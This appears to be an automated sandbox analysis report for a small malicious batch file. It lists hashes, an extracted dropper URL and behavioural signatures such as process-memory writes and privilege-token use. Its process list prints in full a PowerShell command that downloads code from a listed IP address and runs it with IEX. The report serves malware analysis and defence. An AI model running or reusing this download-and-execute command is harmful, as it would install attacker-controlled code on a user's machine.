Analysis
  max time kernel: 12s
  max time network: 50s
  platform: windows7_x64
  resource: win7
  submitted: 31-08-2020 11:10

Static task: static1

Behavioral task: behavioral1
  Sample: 14a4a3784dbc627e1c40e41285df29c2.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: 14a4a3784dbc627e1c40e41285df29c2.bat
  Resource: win10v200722 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: 14a4a3784dbc627e1c40e41285df29c2.bat
  Size: 214B
  MD5: 382d73e9001eda598dfc10e833b7742b
  SHA1: c732b41c5dc34d1b378fb23cc634cc6ee82774fa
  SHA256: 4acb6253945b477cb489a9b8adbe3e5dff9f142c7ec942a0a6d4902ccea3ffd7
  SHA512: b046949436d9c1f153298971c3140b76f5802be988a2b95dca2f2df6102dfdff7d92f3da0fe6c813a65f2af6abd0a8a2227177f3787252d738e82b2231a121eb
  Score: 10/10
Malware Config
  Extracted
    Language: ps1
    Source: ps1.dropper
    URLs: http://185.103.242.78/pastes/14a4a3784dbc627e1c40e41285df29c2
Signatures
  Blacklisted process makes network request (1 IoC)
    Processes:
      flow  pid  process
      5     816  powershell.exe
  Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
    Processes:
      pid  process
      816  powershell.exe
  Suspicious behavior: EnumeratesProcesses (2 IoCs)
    Processes:
      pid  process
      816  powershell.exe
      816  powershell.exe
  Suspicious use of AdjustPrivilegeToken (1 IoC)
    Processes:
      description              pid  process
      Token: SeDebugPrivilege  816  powershell.exe
  Suspicious use of WriteProcessMemory (4 IoCs)
    Processes:
      description                    pid   process  target process
      PID 1156 wrote to memory of 816  1156  cmd.exe  powershell.exe
      PID 1156 wrote to memory of 816  1156  cmd.exe  powershell.exe
      PID 1156 wrote to memory of 816  1156  cmd.exe  powershell.exe
      PID 1156 wrote to memory of 816  1156  cmd.exe  powershell.exe
Processes
  1. C:\Windows\system32\cmd.exe (PID 1156)
     Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\14a4a3784dbc627e1c40e41285df29c2.bat"
     Signatures:
       - Suspicious use of WriteProcessMemory
     2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 816, child of PID 1156)
        Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/14a4a3784dbc627e1c40e41285df29c2');Invoke-ZZXMUDC;Start-Sleep -s 10000"
        Signatures:
          - Blacklisted process makes network request
          - Suspicious behavior: CmdExeWriteProcessMemorySpam
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken